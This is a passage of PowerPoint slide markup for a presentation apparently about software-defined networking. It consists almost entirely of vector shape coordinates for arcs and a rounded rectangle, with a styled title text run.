                <a:lnTo>
                  <a:pt x="1316926" y="2565793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269098" y="2564904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1221320" y="2562250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173645" y="2557830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126147" y="2551646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1078839" y="2543695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031811" y="2533967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985113" y="2522474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938784" y="2509215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="892873" y="2494191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="847458" y="2477401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="802576" y="2458834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758278" y="2438501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714641" y="2416403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671677" y="2392540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629488" y="2366899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596849" y="2399284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="637959" y="2425141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679818" y="2449322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722388" y="2471826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="765619" y="2492679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809434" y="2511856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853821" y="2529370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="898702" y="2545207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="944029" y="2559380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="989761" y="2571889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035850" y="2582722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082230" y="2591905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128877" y="2599410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175715" y="2605240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1222705" y="2609405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269796" y="2611907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1316939" y="2612745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364068" y="2611907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411160" y="2609405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458150" y="2605240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1504988" y="2599410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551635" y="2591905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1598015" y="2582722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1644103" y="2571889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689836" y="2559380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735162" y="2545207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780044" y="2529370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824431" y="2511856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868246" y="2492679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911477" y="2471826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954047" y="2449322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1995906" y="2425141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2037029" y="2399284"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2613025">
                <a:moveTo>
                  <a:pt x="2037029" y="214503"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1995906" y="188531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954047" y="164236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911477" y="141617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868246" y="120662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824431" y="101396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780044" y="83794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735162" y="67881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689836" y="53632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1644103" y="41059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1598015" y="30175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551635" y="20955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1504988" y="13411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458150" y="7543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411160" y="3352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364068" y="838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1316926" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269796" y="838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1222705" y="3352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1175715" y="7543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128877" y="13411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1082230" y="20955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035850" y="30175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="989761" y="41059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="944029" y="53632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="898702" y="67881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853821" y="83794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809434" y="101396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="765619" y="120662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722388" y="141617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679818" y="164236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="637959" y="188531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596849" y="214503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629488" y="247015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671677" y="221246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714641" y="197256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758291" y="175044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="802576" y="154609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="847458" y="135953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="892886" y="119062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938784" y="103962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985113" y="90627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031824" y="79082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1078839" y="69303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126147" y="61302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173657" y="55092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1221320" y="50647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269098" y="47980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1316939" y="47091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364767" y="47980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412544" y="50647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1460220" y="55092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1507718" y="61302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1555026" y="69303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602054" y="79082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1648752" y="90627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695081" y="103962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740992" y="119062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1786407" y="135953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1831289" y="154609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1875586" y="175044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919224" y="197256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1962188" y="221246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2004390" y="247015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2037029" y="214503"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2613025">
                <a:moveTo>
                  <a:pt x="2428697" y="1536319"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2389454" y="1536319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2377846" y="1584223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364181" y="1631276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2348484" y="1677416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2330831" y="1722589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2311260" y="1766760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2289822" y="1809889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2266569" y="1851901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2241550" y="1892757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2214803" y="1932406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2186406" y="1970798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156383" y="2007882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2124799" y="2043620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2091690" y="2077948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057133" y="2110816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2021141" y="2142185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983803" y="2172004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1945132" y="2200211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905215" y="2226767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1864067" y="2251608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821764" y="2274709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1778342" y="2295995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1733854" y="2315426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688363" y="2332964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1641906" y="2348534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594535" y="2362111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546301" y="2373630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546301" y="2412619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595272" y="2401493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643392" y="2388311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1690611" y="2373160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736877" y="2356053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782140" y="2337066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1826361" y="2316226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869490" y="2293594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911477" y="2269210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952269" y="2243124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1991829" y="2215375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030095" y="2186025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067039" y="2155113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2102599" y="2122690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136724" y="2088794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2169376" y="2053475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2200503" y="2016798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2230069" y="1978787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257996" y="1939505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2284272" y="1898992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308834" y="1857298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2331618" y="1814474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352598" y="1770557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2371725" y="1725599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2388946" y="1679651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404211" y="1632762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2417470" y="1584960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2428697" y="1536319"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2613025">
                <a:moveTo>
                  <a:pt x="2428697" y="1079119"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2417470" y="1030401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404211" y="982522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2388946" y="935545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2371725" y="889520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352598" y="844486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2331618" y="800493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308834" y="757593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2284272" y="715822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257996" y="675233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2230069" y="635889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2200503" y="597814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2169376" y="561060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136724" y="525691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2102599" y="491731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067039" y="459244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030095" y="428282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1991829" y="398881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952269" y="371081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911477" y="344957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869490" y="320522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1826361" y="297853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782140" y="276974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736877" y="257962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1690611" y="240830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643392" y="225640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595272" y="212458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546301" y="201295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546301" y="240284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594535" y="251841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1641906" y="265455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688363" y="281063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1733854" y="298640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1778342" y="318122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821764" y="339458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1864067" y="362597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905215" y="387489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1945132" y="414096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983803" y="442366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2021141" y="472236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057133" y="503669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2091702" y="536600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2124799" y="570992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156383" y="606780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2186406" y="643940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2214803" y="682409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2241550" y="722122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2266569" y="763041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2289822" y="805129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2311260" y="848321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2330831" y="892568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2348484" y="937818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364181" y="984034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2377846" y="1031151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2389454" y="1079119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2428697" y="1079119"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2613025">
                <a:moveTo>
                  <a:pt x="2631160" y="1306195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2630322" y="1259408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627795" y="1212672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2623578" y="1166037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2617686" y="1119543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2610116" y="1073251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2600845" y="1027214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589898" y="981468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2577274" y="936066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562961" y="891070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2546959" y="846531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2529281" y="802474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2509913" y="758977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2488857" y="716076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466124" y="673811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441714" y="632256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2415616" y="591439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382977" y="623824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2408859" y="665708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2432964" y="708342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2455291" y="751662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2475827" y="795629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494572" y="840168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2511539" y="885253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2526715" y="930821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2540101" y="976807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2551709" y="1023175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561539" y="1069848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2569565" y="1116799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2575814" y="1163967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2580284" y="1211287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582964" y="1258722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2583853" y="1306195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582964" y="1353680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2580284" y="1401114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2575814" y="1448435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2569565" y="1495602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561539" y="1542542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2551709" y="1589227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2540101" y="1635594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2526715" y="1681581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2511539" y="1727149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494572" y="1772221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2475827" y="1816773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2455291" y="1860740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2432964" y="1904060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2408859" y="1946694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382977" y="1988566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2415616" y="2020951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441714" y="1980145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466124" y="1938591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2488857" y="1896325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2509913" y="1853425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2529281" y="1809927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2546959" y="1765871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562961" y="1721332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2577274" y="1676336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589898" y="1630934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2600845" y="1585188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2610116" y="1539151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2617686" y="1492859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2623578" y="1446364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627795" y="1399730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2630322" y="1352994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631160" y="1306195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69128" y="306451"/>
            <a:ext cx="53162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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software-Defined</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Networking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1415" y="760476"/>
            <a:ext cx="7415784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743646" y="3709606"/>
            <a:ext cx="4018915" cy="1052830"/>
            <a:chOff x="1743646" y="3709606"/>
            <a:chExt cx="4018915" cy="1052830"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1757933" y="3723894"/>
              <a:ext cx="3990340" cy="1024255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3990340" h="1024254">
                  <a:moveTo>
                    <a:pt x="3819144" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170688" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170688" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819144" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864507" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905278" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939825" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966520" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983732" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989831" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989831" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983732" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966520" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939825" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905278" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864507" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819144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757933" y="3723894"/>
              <a:ext cx="3990340" cy="1024255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3990340" h="1024254">
                  <a:moveTo>
                    <a:pt x="0" y="170687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6099" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170688" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819144" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864507" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905278" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939825" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966520" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983732" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989831" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989831" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983732" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966520" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939825" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
